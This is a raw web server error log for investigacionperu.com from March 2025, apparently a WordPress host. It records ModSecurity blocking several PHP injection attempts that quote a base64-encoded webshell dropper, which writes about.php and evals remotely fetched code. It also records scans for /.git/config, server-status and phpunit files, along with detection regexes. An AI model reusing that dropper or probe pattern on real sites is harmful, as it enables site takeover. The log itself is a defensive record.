172.86.72.149:55578] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/03/12 00:01:39 [error] 19477#19477: *240033 access forbidden by rule, client: 79.120.76.144, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Mar 12 03:26:21.712542 2025] [ssl:warn] [pid 4444:tid 140281537075072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 12 03:26:22.017461 2025] [ssl:warn] [pid 4445:tid 140281537075072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 12 03:26:22.482715 2025] [ssl:warn] [pid 4445:tid 140281537075072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 12 03:26:26.704775 2025] [ssl:warn] [pid 4445:tid 140281537075072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 12 03:26:29.050211 2025] [ssl:warn] [pid 4878:tid 140347872626560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 12 03:26:29.243073 2025] [ssl:warn] [pid 4879:tid 140347872626560] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 12 10:16:05.727728 2025] [authz_core:error] [pid 9244:tid 140347527104256] [client 64.227.32.66:37202] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/12 10:16:11 [error] 4860#4860: *245201 access forbidden by rule, client: 64.227.32.66, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Mar 12 15:59:16.578670 2025] [autoindex:error] [pid 5447:tid 140347664701184] [client 64.227.143.222:43964] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Mar 12 20:40:46.137320 2025] [:error] [pid 9244:tid 140347569067776] [client 35.179.118.212:48758] [client 35.179.118.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'X7ROOT';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9I3nkA7nNMnGImowPa3TwAAAQY"], referer: http://investigacionperu.com [Wed Mar 12 20:40:47.860001 2025] [:error] [pid 4898:tid 140347485140736] [client 35.179.118.212:48766] [client 35.179.118.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'X7ROOT';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9I3nzYmXu7fuNXWTy4mawAAAJA"], referer: http://investigacionperu.com [Wed Mar 12 20:40:48.702216 2025] [:error] [pid 4897:tid 140347535496960] [client 35.179.118.212:48770] [client 35.179.118.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdo..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9I3oNk6-eW0sR9C9sgw0gAAAEo"], referer: http://investigacionperu.com [Wed Mar 12 20:40:49.721500 2025] [:error] [pid 4897:tid 140347468355328] [client 35.179.118.212:48774] [client 35.179.118.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdo..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9I3odk6-eW0sR9C9sgw0wAAAFI"], referer: http://investigacionperu.com [Wed Mar 12 20:40:50.668820 2025] [:error] [pid 5447:tid 140347510318848] [client 35.179.118.212:48778] [client 35.179.118.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:js. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:js: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9I3otRV4bREjN8xhKnOjwAAAM0"], referer: http://investigacionperu.com [Wed Mar 12 20:40:51.627321 2025] [:error] [pid 9244:tid 140347417999104] [client 35.179.118.212:48782] [client 35.179.118.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:js. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:js: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Z9I3o0A7nNMnGImowPa3UwAAARg"], referer: http://investigacionperu.com [Wed Mar 12 20:40:53.914037 2025] [:error] [pid 9244:tid 140347434784512] [client 35.179.118.212:48790] [client 35.179.118.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:wp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:wp: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z9I3pUA7nNMnGImowPa3VAAAARY"], referer: http://investigacionperu.com [Wed Mar 12 20:40:54.847219 2025] [:error] [pid 5447:tid 140347426391808] [client 35.179.118.212:48794] [client 35.179.118.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:wp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:wp: echo 'X7ROOT';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAKICBmdW5jdGlvbiBnZXQoJHVybCkgewogICAgICAkY2ggPSBjdXJsX2luaXQoKTsKICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOwogICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOwogICAgICBjdXJsX2Nsb3NlKCRjaCk7CiAgICAgIHJldHVybiAkZGF0YTsKICB9CiAgJG9rID0gJz8+JzsKICBldmFsKCIkb2siIC4gZ2V0KCdod..."] [severity "CRITIC [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Z9I3ptRV4bREjN8xhKnOkQAAANc"], referer: http://investigacionperu.com [Wed Mar 12 22:54:20.765139 2025] [:error] [pid 9244:tid 140347585853184] [client 137.184.38.99:49876] [client 137.184.38.99] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Z9JW7EA7nNMnGImowPa3ugAAAQQ"] [Thu Mar 13 00:46:30.952762 2025] [authz_core:error] [pid 4897:tid 140347560675072] [client 164.90.208.56:51818] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/13 00:46:36 [error] 4860#4860: *253036 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Mar 13 15:25:39.164700 2025] [autoindex:error] [pid 4898:tid 140347476748032] [client 64.227.143.222:56738] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 14 01:43:54.880619 2025] [autoindex:error] [pid 14986:tid 140347501926144] [client 74.225.136.71:38586] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 14 03:22:54.843058 2025] [ssl:warn] [pid 18100:tid 140289817618304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 14 03:22:55.045907 2025] [ssl:warn] [pid 18101:tid 140289817618304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 14 03:22:55.386542 2025] [ssl:warn] [pid 18101:tid 140289817618304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 14 03:22:59.029980 2025] [ssl:warn] [pid 18101:tid 140289817618304] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 14 03:23:01.401501 2025] [ssl:warn] [pid 18554:tid 139875562555264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 14 03:23:01.714003 2025] [ssl:warn] [pid 18555:tid 139875562555264] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 14 15:38:25.595301 2025] [autoindex:error] [pid 19291:tid 139875189741312] [client 64.227.143.222:53420] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 14 16:06:11.252274 2025] [authz_core:error] [pid 18574:tid 139875164563200] [client 159.65.18.197:53946] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/14 16:06:16 [error] 18535#18535: *270075 access forbidden by rule, client: 159.65.18.197, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Mar 14 21:08:17.386602 2025] [authz_core:error] [pid 19291:tid 139875122599680] [client 46.101.111.185:58578] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/14 21:08:22 [error] 18534#18534: *272932 access forbidden by rule, client: 46.101.111.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Mar 15 03:20:25.494830 2025] [ssl:warn] [pid 5841:tid 140399956785024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 15 03:20:25.800886 2025] [ssl:warn] [pid 5842:tid 140399956785024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 15 03:20:26.247593 2025] [ssl:warn] [pid 5842:tid 140399956785024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 15 03:20:30.961175 2025] [ssl:warn] [pid 5842:tid 140399956785024] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 15 03:20:33.257999 2025] [ssl:warn] [pid 6300:tid 140035037165440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 15 03:20:33.458672 2025] [ssl:warn] [pid 6301:tid 140035037165440] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 15 04:10:56.477859 2025] [autoindex:error] [pid 6870:tid 140034837632768] [client 68.183.85.34:36198] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Mar 15 20:30:15.012177 2025] [autoindex:error] [pid 6870:tid 140034690758400] [client 64.227.143.222:48990] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Mar 16 03:19:21.705175 2025] [ssl:warn] [pid 16597:tid 140372241414016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 16 03:19:21.917713 2025] [ssl:warn] [pid 16598:tid 140372241414016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 16 03:19:22.366835 2025] [ssl:warn] [pid 16598:tid 140372241414016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 16 03:19:33.078533 2025] [ssl:warn] [pid 16598:tid 140372241414016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 16 03:19:35.405476 2025] [ssl:warn] [pid 17055:tid 140188700387200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 16 03:19:35.707635 2025] [ssl:warn] [pid 17056:tid 140188700387200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2025/03/16 16:11:30 [error] 17036#17036: *293040 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/16 16:13:00 [error] 17036#17036: *293049 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Mar 16 16:35:29.542639 2025] [autoindex:error] [pid 17879:tid 140188370056960] [client 64.227.143.222:42840] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Mar 16 17:36:08.593146 2025] [authz_core:error] [pid 17879:tid 140188370056960] [client 46.101.1.225:44054] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/16 17:36:12 [error] 17036#17036: *294067 access forbidden by rule, client: 46.101.1.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/16 19:42:55 [error] 17037#17037: *294860 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/16 19:47:33 [error] 17037#17037: *294890 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun Mar 16 20:01:04.403849 2025] [authz_core:error] [pid 17074:tid 140188286129920] [client 164.92.244.132:45500] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/16 20:01:09 [error] 17037#17037: *295005 access forbidden by rule, client: 164.92.244.132, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/16 23:31:28 [error] 17036#17036: *296234 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/16 23:32:33 [error] 17037#17037: *296236 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Mar 17 01:07:12.002764 2025] [:error] [pid 17074:tid 140188260951808] [client 83.97.112.18:50550] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Mar 17 01:07:28.121531 2025] [autoindex:error] [pid 17074:tid 140188269344512] [client 83.97.112.18:50696] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:08:45.604501 2025] [:error] [pid 17073:tid 140188336486144] [client 83.97.112.18:51394] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Mar 17 01:08:55.049507 2025] [:error] [pid 17879:tid 140188517639936] [client 83.97.112.18:51484] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Mar 17 01:10:00.735324 2025] [:error] [pid 17075:tid 140188311308032] [client 83.97.112.18:52036] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/eew.php [Mon Mar 17 01:10:58.859697 2025] [autoindex:error] [pid 17075:tid 140188378449664] [client 83.97.112.18:52526] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/03/17 01:10:59 [error] 17036#17036: *298341 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 83.97.112.18, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2025/03/17 01:10:59 [error] 17036#17036: *298341 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 83.97.112.18, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Mon Mar 17 01:11:04.268001 2025] [autoindex:error] [pid 17879:tid 140188319700736] [client 83.97.112.18:52564] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Mar 17 01:11:12.658998 2025] [autoindex:error] [pid 17879:tid 140188370056960] [client 83.97.112.18:52624] AH01276: Cannot serve 